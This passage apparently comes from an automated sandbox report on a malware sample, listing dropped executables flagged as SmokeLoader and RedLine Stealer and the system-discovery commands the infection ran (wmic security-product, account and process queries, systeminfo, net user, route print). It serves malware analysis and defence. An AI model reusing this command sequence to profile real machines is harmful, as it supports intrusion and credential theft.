                                                                                                                                      Imagebase:0x7ff72b770000
                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:21:14:19
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\jghruer
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\jghruer
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:454'144 bytes
                                                                                                                                      MD5 hash:A27775738FAFF754DCF5C3E8E42B9838
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 29%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:21:14:55
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\35DB.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\35DB.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:453'632 bytes
                                                                                                                                      MD5 hash:366910063EF4A518B6ADF6D28C7B2C69
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:21:15:19
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\hdhruer
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\hdhruer
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:453'632 bytes
                                                                                                                                      MD5 hash:366910063EF4A518B6ADF6D28C7B2C69
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:21:15:34
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\B972.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\B972.exe
                                                                                                                                      Imagebase:0x7ff6f2d60000
                                                                                                                                      File size:78'336 bytes
                                                                                                                                      MD5 hash:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:21:15:34
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                      Imagebase:0x7ff75b410000
                                                                                                                                      File size:69'632 bytes
                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:21:15:36
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:cmd
                                                                                                                                      Imagebase:0x7ff76e480000
                                                                                                                                      File size:289'792 bytes
                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:21:15:36
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:21:15:37
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Imagebase:0x7ff70f330000
                                                                                                                                      File size:4'514'184 bytes
                                                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:21:15:37
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:21:15:38
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                                                                      Imagebase:0x7ff72b770000
                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:21:15:39
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Imagebase:0x150000
                                                                                                                                      File size:4'514'184 bytes
                                                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:21:15:39
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:21:15:40
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                                                                      Imagebase:0x7ff72b770000
                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:21:15:41
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Imagebase:0x150000
                                                                                                                                      File size:4'514'184 bytes
                                                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:21:15:41
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                                                                                      Imagebase:0x7ff72bec0000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:21
                                                                                                                                      Start time:21:15:42
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                                                                      Imagebase:0x7ff72b770000
                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:22
                                                                                                                                      Start time:21:15:43
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:23
                                                                                                                                      Start time:21:15:46
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:24
                                                                                                                                      Start time:21:15:49
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:25
                                                                                                                                      Start time:21:15:51
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:26
                                                                                                                                      Start time:21:15:53
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:27
                                                                                                                                      Start time:21:15:55
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:28
                                                                                                                                      Start time:21:16:01
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:29
                                                                                                                                      Start time:21:16:04
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:30
                                                                                                                                      Start time:21:16:08
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:31
                                                                                                                                      Start time:21:16:11
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:32
                                                                                                                                      Start time:21:16:15
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:33
                                                                                                                                      Start time:21:16:17
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:ipconfig /displaydns
                                                                                                                                      Imagebase:0x7ff7a16e0000
                                                                                                                                      File size:35'840 bytes
                                                                                                                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:34
                                                                                                                                      Start time:21:16:19
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:route print
                                                                                                                                      Imagebase:0x7ff7f10e0000
                                                                                                                                      File size:24'576 bytes
                                                                                                                                      MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:35
                                                                                                                                      Start time:21:16:19
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:netsh firewall show state
                                                                                                                                      Imagebase:0x7ff621560000
                                                                                                                                      File size:96'768 bytes
                                                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:36
                                                                                                                                      Start time:21:16:20
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:systeminfo
                                                                                                                                      Imagebase:0x7ff7d2e90000
                                                                                                                                      File size:110'080 bytes
                                                                                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:38
                                                                                                                                      Start time:21:16:23
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:tasklist /v /fo csv
                                                                                                                                      Imagebase:0x7ff6bc140000
                                                                                                                                      File size:106'496 bytes
                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:39
                                                                                                                                      Start time:21:16:55
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:net accounts /domain
                                                                                                                                      Imagebase:0x7ff75bf80000
                                                                                                                                      File size:59'904 bytes
                                                                                                                                      MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:40
                                                                                                                                      Start time:21:16:55
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net1.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\net1 accounts /domain
                                                                                                                                      Imagebase:0x7ff620e40000
                                                                                                                                      File size:183'808 bytes
                                                                                                                                      MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:41
                                                                                                                                      Start time:21:16:56
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:net share
                                                                                                                                      Imagebase:0x7ff75bf80000
                                                                                                                                      File size:59'904 bytes
                                                                                                                                      MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:42
                                                                                                                                      Start time:21:16:56
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net1.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\net1 share
                                                                                                                                      Imagebase:0x7ff620e40000
                                                                                                                                      File size:183'808 bytes
                                                                                                                                      MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:43
                                                                                                                                      Start time:21:16:58
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:net user
                                                                                                                                      Imagebase:0x7ff75bf80000
                                                                                                                                      File size:59'904 bytes
                                                                                                                                      MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
